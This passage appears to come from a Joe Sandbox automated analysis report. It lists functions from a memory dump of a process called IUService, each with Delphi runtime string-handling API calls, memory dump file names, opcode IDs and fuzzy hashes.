                                                                                                                                            • Instruction Fuzzy Hash: D901D630904688AFEF05CFB5DC519CEB7E8DF4A210F90467AF800D3251EE349E008650
                                                                                                                                            Function 5000B590 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 5000B59C
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000B600), ref: 5000B5CE
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@WStrFromPCharLen$qqrr17System@WideStringpci.RTL120(00000000,5000B600), ref: 5000B5E5
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5000B607), ref: 5000B5FA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$FromSystem@$AnsiStr$qqrr27StringStringusSystem@%T$us$i0$%x20Unicode$CharClr$qqrpvInternalLen$qqrr17Ref$qqrpvStringpciWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 179845556-0
                                                                                                                                            • Opcode ID: 8a79d907e03b4d6e94affb683d3040e6e61c9eeb7bdf99ad1ec3cb23640d17fb
                                                                                                                                            • Instruction ID: 34ef6e9b8ab651ca66ea423fa2b672ec6f6307ffe3dcc90be6e42d6dd710627f
                                                                                                                                            • Opcode Fuzzy Hash: 8a79d907e03b4d6e94affb683d3040e6e61c9eeb7bdf99ad1ec3cb23640d17fb
                                                                                                                                            • Instruction Fuzzy Hash: 8B014F30A14689DFAF15EFB8DD6166EB7F8EB44300BE042B5A404D3294EB75EE00D785
                                                                                                                                            Function 5001D088 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@ExtractFilePath$qqrx20System@UnicodeString.RTL120(00000000,5001D0F1), ref: 5001D0AB
                                                                                                                                              • Part of subcall function 5001C610: @Sysutils@LastDelimiter$qqrx20System@UnicodeStringt1.RTL120(?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C61E
                                                                                                                                              • Part of subcall function 5001C610: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,00000001,5001BE69,00000000,5001BEBF,?,?,00000000,00000000,00000000,00000000), ref: 5001C62F
                                                                                                                                            • @Sysutils@ExtractFileDrive$qqrx20System@UnicodeString.RTL120(00000000,5001D0F1), ref: 5001D0B5
                                                                                                                                              • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C749
                                                                                                                                              • Part of subcall function 5001C70C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C774
                                                                                                                                              • Part of subcall function 5001C70C: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C79A
                                                                                                                                            • @System@@UStrDelete$qqrr20System@UnicodeStringii.RTL120(00000000,5001D0F1), ref: 5001D0D6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$String$StringiiSysutils@$AnsiCopy$qqrx20ExtractFileFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$Delete$qqrr20Delimiter$qqrx20Drive$qqrx20LastPath$qqrx20Stringt1
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2728986464-0
                                                                                                                                            • Opcode ID: 753f7e1a6c6c97bbf24396121e6cbfb91f1a8a2250ef5da3e68a7d15cb4d6440
                                                                                                                                            • Instruction ID: b42390ce6f7e2cc3f0a2e75dff1ecda8a9c22fa8fff3ef8285b34e87ebe0e190
                                                                                                                                            • Opcode Fuzzy Hash: 753f7e1a6c6c97bbf24396121e6cbfb91f1a8a2250ef5da3e68a7d15cb4d6440
                                                                                                                                            • Instruction Fuzzy Hash: 36F0C230714A889FDB05CFBCDC9195D77E8EB8D210F6046B6F404D3381EA34DE429694
                                                                                                                                            Function 5000D1EC Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrToString$qqrv.RTL120(00000000,5000D25A,?,?,?,00000000), ref: 5000D229
                                                                                                                                            • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D25A,?,?,?,00000000), ref: 5000D235
                                                                                                                                            • @System@UTF8EncodeToShortString$qqrx20System@UnicodeString.RTL120(00000000,5000D25A,?,?,?,00000000), ref: 5000D23F
                                                                                                                                              • Part of subcall function 5000D160: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D199
                                                                                                                                              • Part of subcall function 5000D160: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1AD
                                                                                                                                              • Part of subcall function 5000D160: @System@UnicodeToUtf8$qqrpcuipbui.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1BC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20EncodeInternalShortString$qqrvString$qqrx20Utf8$qqrpcuipbui
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3607580448-0
                                                                                                                                            • Opcode ID: fb3adfc1b616c63d37c10a095645c24805800dc440cd7556cb7450fc6099ad38
                                                                                                                                            • Instruction ID: 1c16621e2cb8d67273f367093e7f4ec9039ce1562dd6be5a7fed7262e5487efd
                                                                                                                                            • Opcode Fuzzy Hash: fb3adfc1b616c63d37c10a095645c24805800dc440cd7556cb7450fc6099ad38
                                                                                                                                            • Instruction Fuzzy Hash: E8F0C238705AC4ABF7109EA5997156A72E9EBA8600FD18273F900C3641DA74DD0392A0
                                                                                                                                            Function 5000B610 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B67E), ref: 5000B64C
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(00000000,5000B67E), ref: 5000B663
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FromSystem@System@@$AnsiStr$qqrr20StringStringx27System@%T$us$i0$%Unicode$CharInternalLen$qqrr17StringpbiWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3836375802-0
                                                                                                                                            • Opcode ID: 121b1d7daa110de507159fd92aaf49f5188387cc7d6252307e2916458b3dc339
                                                                                                                                            • Instruction ID: 5ba6b1cf659b0eac9df44331a80376275ae431139069cf899d630c05516daaeb
                                                                                                                                            • Opcode Fuzzy Hash: 121b1d7daa110de507159fd92aaf49f5188387cc7d6252307e2916458b3dc339
                                                                                                                                            • Instruction Fuzzy Hash: 12016D30A00688DFEB11DFB8D96259DB7F9EB85300BE046B2E504E3254EB35DF10DA40
                                                                                                                                            Function 5000D0AC Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAsg$qqrpvpxv.RTL120(00000000,5000D115,?,?,?,00000000), ref: 5000D0E4
                                                                                                                                            • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D115,?,?,?,00000000), ref: 5000D0F0
                                                                                                                                            • @System@UTF8Encode$qqrx20System@UnicodeString.RTL120(00000000,5000D115,?,?,?,00000000), ref: 5000D0FA
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@LStrClr$qqrpv.RTL120(00000000,5000D09C), ref: 5000CFB7
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D09C), ref: 5000CFDE
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@LStrSetLength$qqrv.RTL120(00000000,5000D09C), ref: 5000CFF9
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000D09C), ref: 5000D01A
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,5000D09C), ref: 5000D02E
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,00000000,5000D09C), ref: 5000D037
                                                                                                                                              • Part of subcall function 5000CF8C: @System@UnicodeToUtf8$qqrpcuipbui.RTL120(00000000,00000000,5000D09C), ref: 5000D040
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@LStrSetLength$qqrv.RTL120(00000000,00000000,5000D09C), ref: 5000D056
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@LStrAsg$qqrpvpxv.RTL120(00000000,00000000,5000D09C), ref: 5000D06A
                                                                                                                                              • Part of subcall function 5000CF8C: @System@@LStrClr$qqrpv.RTL120(5000D0A3), ref: 5000D08E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$StringUnicode$AnsiSystem@%$FromT$us$i0$%$Asg$qqrpvpxvClr$qqrpvInternalLength$qqrvStr$qqrr20Stringx27$Char$qqrx20Char$qqrx27Encode$qqrx20Str$qqrr27StringusT$us$i0$%x20Utf8$qqrpcuipbui
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 307145936-0
                                                                                                                                            • Opcode ID: 08819d0066f00755660bc180d09a58690c32542b5e0c166a016e8ed3854df67c
                                                                                                                                            • Instruction ID: 80467bac8e14cd6db259491f32d78e6933cbc81cdce2657633e505d679178eb2
                                                                                                                                            • Opcode Fuzzy Hash: 08819d0066f00755660bc180d09a58690c32542b5e0c166a016e8ed3854df67c
                                                                                                                                            • Instruction Fuzzy Hash: F9F08B38704AC8ABF7109FA49C7166973EEDB84600FE04133F900C3601DB74DD0791A4
                                                                                                                                            Function 50009390 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@WStrLen$qqrx17System@WideString.RTL120(00000000,500093F1,?,?,?,?,00000000,?,5000938F), ref: 500093AE
                                                                                                                                            • @System@@LStrFromWStr$qqrr27System@%AnsiStringT$us$i0$%x17System@WideStringus.RTL120(00000000,500093F1,?,?,?,?,00000000,?,5000938F), ref: 500093C8
                                                                                                                                            • @System@@WriteLString$qqrr15System@TTextRecx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,500093F1,?,?,?,?,00000000,?,5000938F), ref: 500093D4
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(500093F8,?,?,?,00000000,?,5000938F), ref: 500093EB
                                                                                                                                              • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$StringSystem@$AnsiSystem@%Wide$Clr$qqrpvFreeFromLen$qqrx17Mem$qqrpvRecx27Str$qqrr27String$qqrr15StringusT$us$i0$%iT$us$i0$%x17TextWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1130800983-0
                                                                                                                                            • Opcode ID: b849d90925cc33044c776b6e4e2f5848c8cfe3ce250f7a05f47d86eedd24106f
                                                                                                                                            • Instruction ID: ef5ea901b8e5fa30709b5689cebf9e2eb1ad37d003b92d6465d3830585f69d9b
                                                                                                                                            • Opcode Fuzzy Hash: b849d90925cc33044c776b6e4e2f5848c8cfe3ce250f7a05f47d86eedd24106f
                                                                                                                                            • Instruction Fuzzy Hash: DFF059307042846BEB14CAB8AC71A4EB2DDDB89600FE18577B500C3381DD30DE018690
                                                                                                                                            Function 5000D5D0 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                            • LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120 ref: 5000D62C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$FromSystem@@Unicode$CharChar$qqrr20FindInstance$qqruiLen$qqrr20LoadResourceStringStringpbStringpbi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2990883651-0
                                                                                                                                            • Opcode ID: 55ca08126530cfa26b8a12066b7b7f1d4282c8620ddcc8f6fe61370ac2b4a099
                                                                                                                                            • Instruction ID: 492cc944b019d22fa5aeb3a5e8639eadf2eec20015de2a4354c3fe8e2fc88a12
                                                                                                                                            • Opcode Fuzzy Hash: 55ca08126530cfa26b8a12066b7b7f1d4282c8620ddcc8f6fe61370ac2b4a099
                                                                                                                                            • Instruction Fuzzy Hash: E7F02EB4701A808BFB10CA8CD8E2F8A73DC8B18201F808223B94CCB346DA21DD0183A2
                                                                                                                                            Function 5000472C Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000473D
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 50004752
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,?,00000105), ref: 5000475D
                                                                                                                                              • Part of subcall function 50009E7C: @System@@NewUnicodeString$qqri.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009E87
                                                                                                                                              • Part of subcall function 50009E7C: @System@Move$qqrpxvpvi.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009E9A
                                                                                                                                              • Part of subcall function 50009E7C: @System@@LStrClr$qqrpv.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009EA1
                                                                                                                                            • GetCommandLineW.KERNEL32 ref: 50004764
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@System@@Unicode$Asg$qqrr20CharClr$qqrpvCommandFileFromLen$qqrr20LineModuleMove$qqrpxvpviNameStringString$qqriStringpbiStringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2864874161-0
                                                                                                                                            • Opcode ID: b2b830a017bee59d4e872495292ad1b13696414d59f0388ff4c3bb92921b499a
                                                                                                                                            • Instruction ID: 6a03e17f4bd4c64ae8d53e0fe39c767496f35d0f4fe9983f0094101a5260a8ef
                                                                                                                                            • Opcode Fuzzy Hash: b2b830a017bee59d4e872495292ad1b13696414d59f0388ff4c3bb92921b499a
                                                                                                                                            • Instruction Fuzzy Hash: CCF02EB174569053F75191AC5CA1BDF51CA4BC5551F994336BF0CCB342EE70CC0082C6
                                                                                                                                            Function 5002688C Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002689B
                                                                                                                                            • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,500268EC,?,?,?,?,00000000), ref: 500268C0
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,500268EC,?,?,?,?,00000000), ref: 500268CB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20MetaRecxiStringStringpx14Stringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2203270808-0
                                                                                                                                            • Opcode ID: ccc7b6e6f2e119070dd8617dd0e382500ae0a435e3e97db025f3ba1d8bace3fb
                                                                                                                                            • Instruction ID: 62b2d6722134464f4681b16f86bc22ffda435385ec3fff5c8aa35c22120bf3af
                                                                                                                                            • Opcode Fuzzy Hash: ccc7b6e6f2e119070dd8617dd0e382500ae0a435e3e97db025f3ba1d8bace3fb
                                                                                                                                            • Instruction Fuzzy Hash: 48F0C275600689AFE700CF94EC51C5AB7ADEB89720B918372F90883740DB31EE01C6D0
                                                                                                                                            Function 500154BC Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,5001551A,?,?,?,00000000,00000000), ref: 500154DC
                                                                                                                                              • Part of subcall function 50019EBC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019EF5
                                                                                                                                              • Part of subcall function 50019EBC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50019F40,?,?,?,?,?,500154E1,00000000,5001551A,?,?,?,00000000,00000000), ref: 50019F08
